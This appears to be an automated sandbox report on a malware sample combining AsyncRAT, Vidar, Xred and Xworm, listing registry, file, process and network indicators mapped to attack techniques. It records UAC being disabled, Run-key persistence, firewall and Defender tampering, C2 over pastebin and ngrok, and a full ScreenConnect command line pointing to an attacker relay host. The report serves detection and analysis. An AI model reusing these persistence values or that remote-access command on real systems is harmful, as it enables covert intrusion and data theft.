asyncrat | 672ad2d52af206cc63cebe2c801181d3b406aae5891cc57bdaafd5eea3d61fe6

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Adds policy Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	$77-Bitdefender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	$77-Bitdefender.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run	ApiUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	ApiUpdater.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5404	powershell.exe
5580	powershell.exe
5728	powershell.exe

Disables Task Manager via registry modification
defense_evasion

Downloads MZ/PE file 25 IoCs

flow	pid	Process
8	2416	._cache_Synaptics.exe
80	2416	._cache_Synaptics.exe
11	3836	._cache_New Text Document mod.exe
11	3836	._cache_New Text Document mod.exe
11	3836	._cache_New Text Document mod.exe
58	2416	._cache_Synaptics.exe
58	2416	._cache_Synaptics.exe
9	3836	._cache_New Text Document mod.exe
13	3836	._cache_New Text Document mod.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
43	2416	._cache_Synaptics.exe
6	2416	._cache_Synaptics.exe
7	3836	._cache_New Text Document mod.exe
16	3836	._cache_New Text Document mod.exe
21	3836	._cache_New Text Document mod.exe
59	2416	._cache_Synaptics.exe
5	3836	._cache_New Text Document mod.exe

Modifies Windows Firewall 2 TTPs 16 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3096	netsh.exe
3296	netsh.exe
5732	netsh.exe
564	netsh.exe
4756	netsh.exe
4980	netsh.exe
388	netsh.exe
5456	netsh.exe
6836	netsh.exe
5496	netsh.exe
3728	netsh.exe
5808	netsh.exe
5072	netsh.exe
916	netsh.exe
5272	netsh.exe
7092	netsh.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (0cef7d10d8f459fc)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=mail.mindfulinvoice.online&p=8041&s=950eb78c-2c84-4723-905f-38bbae3d8637&k=BgIAAACkAABSU0ExAAgAAAEAAQBBzfcAyYpoA9s86t45oTU7RBr4d3j4wo7ZWaxqW1gXVfaaoS%2bfd0k%2bPJKuwjzsEUcR0STNhshdEUFtsJUgTCaM2RxVswQODfRB%2fxy8spQ2LWWZZewzTdxJbjosBiXV2QpUCcfCmF5yx2%2fO4iVCF7r%2bUlzDG93NmkPtCrZC9yxqlnxALMX%2bF%2faXCCBkyDmMu3o22AbtP3XzZdSzxk8RbscXClS7evLV%2bxau13F1YFn%2baxZ7QaXuHbPv1tE2Bs26tkj%2fE18oOxpgof0OaK2Jy%2bP9WIy8ymeDPQIfocdTFuAek5wZ3lNpFAcbox7NXzIde9yf0dLrOLPA36Dg%2fHz05hjY&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAYKhdARvbJk2G%2fIBY6xqmJgAAAAACAAAAAAAQZgAAAAEAACAAAABOSz9An3tBO64GBdOYPhrvbARd1iJPf58O%2bAgUrv9i4AAAAAAOgAAAAAIAACAAAABL3DcJRgiZG6uvhlfOCOMwTk1JrGVeYy6DRMNluGQ1KqAEAAAZmbn%2bpd%2bXQNRWRyEkGvzIeRLaEmly4jvCIz35bpJe2RfnPDW8aaKpkw8NY1MpGzo0Z%2b7sNfKV41aGq5SkSuDtwoO3%2bNxkqXmXp6CFaiyJIgo%2fzha5Vt4dzEkzOCwrMHUpUbEn7GI9qCvlcP%2bbj534Wf52VjUEwSbp3mibpSTpu1kGR9omz2vdYXFv%2bOtxB73jInG8lx33g49uJhXZPG9LlH28aoBkoxzxxjkBZw6WTy59T4i6eI4do43rRp1sZCqyIgPfJcvf0qmxfnbjJGDU8g2FWIgDsQmAaeSazUAWe3g3zkkHcDp1kAYOXiE91hzEATbWohMpnUE7bWoxL4eb2S8Ff8RorM0XwlBRfEtAyNlfSonK9rkmTiWMAUk0QH3R6zKxdGA%2f37SgQv5TUZLAwiZGZ55XaecuMQ7gHXOWxwwoNYhF1nwwZVFqGxNeYJsQKILe9DqHf78dZiXbp5r3geS1AMcDt%2bAB7i2PP8LtzKDPUSLppTwBvwbwk2AIyDRiubYuABT2g4NIiwwmPRYgu%2fPkSgKxGxx%2fr47uu%2bQDwGkt8UbkrUCXnskD8b5aYenFzL88Z%2fehI5AS5d37D%2bdo70ILmIZKF1npOyThTpAT3G5%2bxy2kS6Ll4vtPguwX%2bwo3TzA%2f9vgYcQQqMfZqxm1RgMPDCw48utuWGxzC51J1pRTmjzSZ12XtE%2b9awTfxL%2b4P2M3gl1t1jB7redDQ1BPwAzTS%2fNrNSK9ZuzlOpv3BTgMGk8hWcjncx3HCAX6AB%2fg01t8RdZ9Azs024aydrQt5ob0pvG58X7ZVb1vlIBKK0jRjwsCpKafR4wfXYXBGVJE30jZ4puq5lQp52%2f7kOdGc27FNFH3Om5cNsgR9eygeJ%2fdf71d2O4QWziD7WVWu8yzNoH1yrZwZWEgeMgoikxr4XxB2p%2bpRcuaANO6AsZSqPBJCfhImErOSFdwnJ%2bDUpSHKtkQuA0s%2fVQzn1knY%2b%2bxUJY2aUdugi2UKRKXGZCQMcxHr%2brLgC7V%2fEnHvQ%2fmHGHn9yn00vTXZdHTcZJ5SO78Y3iXnnQvxC22cMO7H7eB2jIK4rNRGI7Fw8OZqJ%2bRtslQDxSGECbkbWseeKPrHj8V8ghLuQP5%2fDrjVyrKyF9oj7L46JADr0eXCIZcwCFzET%2bM4bMFrJCsgPW%2bltiMGm8Kt9nOTv41RmCDmCDpiwVM0MFM59BwScd%2f1UCi%2bt9t34AUT9wOCYHwKAKv9LA5Teok9boWZ%2bmfCZXMa8nBBRQnqmFK6N0QDoi6mGlwcGLlQsWvofQmEwNZQ0FDzQk6nFOJOJoS7jJl29Z%2bfezfJFEfWEDeDVa%2b9h9FcT6uETfAkPIgZtWUb09Ek00AyXluWGoJJngENNjBC4yo1FdbMkr3tkvEH5zNivNEK1lYiMbXPNOApc2I9SqyYs3raCVD81rcqowKtZ9LUkBmkkbUIq51stjg%2fW%2fXRv5gZlqkQ69svaHrYK18qrKp3L1CgDgpstw3ctqB2mJbf9QFzHgWxpVJs1Nb3uQsHwHi5OheVtVXP1EOU0jXaKXXqAcgDV7tpBXV%2bI2kJOg8lFkOVZAbO5GHNmkAAAACzCjHv3qdrVNGhNjxZCfBrpzHd%2bLyFdtt7%2frmY2rH4l8cQcXZPuaZQaSMETgIhw7kL2CoJUQOnoCuwDQ1ANhkR&c=zoom&c=zoom-invite.com&c=&c=&c=&c=&c=&c=\""	ScreenConnect.ClientService.exe

Drops startup file 16 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk	Network.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8c4f4669aaf7e763f29c3228e3c660dWindows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HasInfo.vbs	Update.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe	Powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe	Powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	server.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Explower.exe	server.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe	Powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe	Powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ef9410a92d1077d89c94b9208aa74f96Windows Update.exe	server.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

pid	Process
3836	._cache_New Text Document mod.exe
3476	Synaptics.exe
2416	._cache_Synaptics.exe
3320	1.exe
3560	Update.exe
948	test.exe
4340	zoom_invitecode=23884232.zoom.exe
3100	noyjhoadw.exe
3744	ApiUpdater.exe
1556	Surrey.com
4740	windows.exe
4540	T.exe
2116	Enalib.exe
2620	$77-Bitdefender.exe
4960	36.exe
4700	access.exe
1948	system.exe
4808	BQEHIQAG.exe
4816	BQEHIQAG.exe
1820	DBDownloader.exe
2988	DBDownloader.exe
4612	ApiUpdater.exe
4628	99999.exe
1140	22.exe
3828	ScreenConnect.ClientService.exe
1104	server.exe
4792	discordupdate.exe
1540	ScreenConnect.WindowsClient.exe
3916	Network.exe
2620	rea.exe
1916	msinfo32.exe
5084	ScreenConnect.WindowsClient.exe
2404	MSystem32.exe
5172	SharpHound.exe
5284	mod.exe
3668	Server.exe
5512	msinfo32.exe
5500	server.exe
5764	Client.exe
6020	jij.exe
5268	333.exe
1784	Windows Shell Interactive.exe
5792	Network.exe
3836	._cache_New Text Document mod.exe
3476	Synaptics.exe
2416	._cache_Synaptics.exe
3320	1.exe
3560	Update.exe
948	test.exe
4340	zoom_invitecode=23884232.zoom.exe
3100	noyjhoadw.exe
3744	ApiUpdater.exe
1556	Surrey.com
4740	windows.exe
4540	T.exe
2116	Enalib.exe
2620	$77-Bitdefender.exe
4960	36.exe
4700	access.exe
1948	system.exe
4808	BQEHIQAG.exe
4816	BQEHIQAG.exe
1820	DBDownloader.exe
2988	DBDownloader.exe

Loads dropped DLL 64 IoCs

pid	Process
3656	MsiExec.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4816	BQEHIQAG.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
3668	MsiExec.exe
4716	MsiExec.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3828	ScreenConnect.ClientService.exe
3476	Synaptics.exe
3476	Synaptics.exe
3656	MsiExec.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4612	rundll32.exe
4816	BQEHIQAG.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
1820	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe
2988	DBDownloader.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	ApiUpdater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	ApiUpdater.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	$77-Bitdefender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""	$77-Bitdefender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Service = "C:\\Program Files (x86)\\WAN Service\\wansv.exe"	MSystem32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network = "C:\\Users\\Admin\\AppData\\Roaming\\Network.exe"	Network.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WAN Service = "C:\\Program Files (x86)\\WAN Service\\wansv.exe"	jij.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	New Text Document mod.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MSystem32.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	jij.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

persistence privilege_escalation

description	ioc	Process
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
93	pastebin.com
133	pastebin.com
256	pastebin.com
396	2.tcp.eu.ngrok.io
403	pastebin.com
11	raw.githubusercontent.com
75	pastebin.com
295	pastebin.com
70	pastebin.com
164	pastebin.com
111	pastebin.com
184	pastebin.com
204	pastebin.com
228	pastebin.com
291	pastebin.com
345	pastebin.com
4	raw.githubusercontent.com
86	pastebin.com
289	2.tcp.eu.ngrok.io
317	pastebin.com
125	pastebin.com
178	pastebin.com
272	raw.githubusercontent.com
289	0.tcp.eu.ngrok.io
329	raw.githubusercontent.com
424	pastebin.com
37	pastebin.com
173	pastebin.com
399	pastebin.com
433	pastebin.com
60	pastebin.com
128	pastebin.com
305	pastebin.com
311	pastebin.com
346	raw.githubusercontent.com
358	pastebin.com
372	0.tcp.eu.ngrok.io
385	pastebin.com
43	raw.githubusercontent.com
175	pastebin.com
326	pastebin.com
156	pastebin.com
267	raw.githubusercontent.com
348	raw.githubusercontent.com
349	raw.githubusercontent.com
396	0.tcp.in.ngrok.io
280	pastebin.com
347	raw.githubusercontent.com
251	0.tcp.in.ngrok.io
350	raw.githubusercontent.com
374	pastebin.com
442	pastebin.com
79	pastebin.com
218	pastebin.com
161	pastebin.com
193	pastebin.com
199	pastebin.com
263	pastebin.com
364	pastebin.com
369	raw.githubusercontent.com
53	pastebin.com
121	pastebin.com
188	pastebin.com
206	pastebin.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
252	ip-api.com
37	ip-api.com

Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

Suspicious Windows Authentication Registry Modification.

Authentication Package

T1547.002

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800300063006500660037006400310030006400380066003400350039006600630029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000	msiexec.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	server.exe
File opened for modification	C:\autorun.inf	server.exe
File created	F:\autorun.inf	server.exe
File opened for modification	F:\autorun.inf	server.exe

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\dll32\msinfo32.exe	msinfo32.exe
File opened for modification	C:\Windows\system32\dll32	msinfo32.exe
File opened for modification	C:\Windows\system32\Windows Shell Interactive.exe	Windows Shell Interactive.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\hrbjwspz.newcfg	ScreenConnect.ClientService.exe
File opened for modification	C:\Windows\system32\dll32	msinfo32.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\dll32\msinfo32.exe	discordupdate.exe
File opened for modification	C:\Windows\system32\dll32	discordupdate.exe
File opened for modification	C:\Windows\system32\dll32\msinfo32.exe	msinfo32.exe
File created	C:\Windows\system32\Windows Shell Interactive.exe	Client.exe
File opened for modification	C:\Windows\system32\Windows Shell Interactive.exe	Client.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (0cef7d10d8f459fc)\hrbjwspz.tmp	ScreenConnect.ClientService.exe
File created	C:\Windows\system32\dll32\msinfo32.exe	discordupdate.exe
File created	C:\Windows\SysWOW64\Explower.exe	server.exe
File opened for modification	C:\Windows\SysWOW64\Explower.exe	server.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
860	tasklist.exe
3848	tasklist.exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 2620 set thread context of 2624	2620	$77-Bitdefender.exe	121
PID 3560 set thread context of 3568	3560	Update.exe	125
PID 4612 set thread context of 5084	4612	ApiUpdater.exe	170
PID 2620 set thread context of 5088	2620	rea.exe	169
PID 2988 set thread context of 1268	2988	DBDownloader.exe	149
PID 2620 set thread context of 2624	2620	$77-Bitdefender.exe	121
PID 3560 set thread context of 3568	3560	Update.exe	125
PID 4612 set thread context of 5084	4612	ApiUpdater.exe	170
PID 2620 set thread context of 5088	2620	rea.exe	169
PID 2988 set thread context of 1268	2988	DBDownloader.exe	149

Drops file in Program Files directory 25 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.resources	msiexec.exe
File opened for modification	C:\Program Files (x86)\WAN Service\wansv.exe	jij.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Windows.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\system.config	msiexec.exe
File created	C:\Program Files (x86)\Explower.exe	server.exe
File opened for modification	C:\Program Files (x86)\Explower.exe	server.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Core.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsAuthenticationPackage.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsFileManager.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.Override.en-US.resources	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.resources	msiexec.exe
File created	C:\Program Files (x86)\WAN Service\wansv.exe	MSystem32.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.Client.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsCredentialProvider.dll	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\app.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\Client.en-US.resources	msiexec.exe
File opened for modification	C:\Program Files (x86)\WAN Service\wansv.exe	MSystem32.exe
File created	C:\Program Files (x86)\WAN Service\wansv.exe	jij.exe
File created	C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.dll	msiexec.exe

Drops file in Windows directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\SourceHash{85F34968-1C69-C400-0998-25E265AEE9E4}	msiexec.exe
File created	C:\Windows\Installer\wix{85F34968-1C69-C400-0998-25E265AEE9E4}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\e57d311.msi	msiexec.exe
File created	C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\{85F34968-1C69-C400-0998-25E265AEE9E4}\DefaultIcon	msiexec.exe
File created	C:\Windows\SystemTemp\~DF6AEF9D7099DAA0BF.TMP	msiexec.exe
File opened for modification	C:\Windows\TransferRare	1.exe
File opened for modification	C:\Windows\NavyPromising	1.exe
File opened for modification	C:\Windows\Installer\MSID979.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIDC68.tmp	msiexec.exe
File created	C:\Windows\SystemTemp\~DF36878F747018455A.TMP	msiexec.exe
File opened for modification	C:\Windows\HonoluluSyndrome	1.exe
File opened for modification	C:\Windows\ViBases	1.exe
File created	C:\Windows\Installer\e57d30f.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57d30f.msi	msiexec.exe
File created	C:\Windows\SystemTemp\~DFA4A0AD2D1EBD8338.TMP	msiexec.exe
File created	C:\Windows\SystemTemp\~DF969AC64503A22B52.TMP	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID699.tmp	msiexec.exe
File opened for modification	C:\Windows\OxfordPrintable	1.exe
File opened for modification	C:\Windows\ImmediatelyBros	1.exe
File opened for modification	C:\Windows\EscortsNascar	1.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 8 IoCs

pid	pid_target	Process	procid_target
4148	4960	WerFault.exe	126
4992	5584	WerFault.exe	420
1924	6288	WerFault.exe	476
4844	1172	WerFault.exe	396
4148	4960	WerFault.exe	126
4992	5584	WerFault.exe	420
1924	6288	WerFault.exe	476
4844	1172	WerFault.exe	396

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery
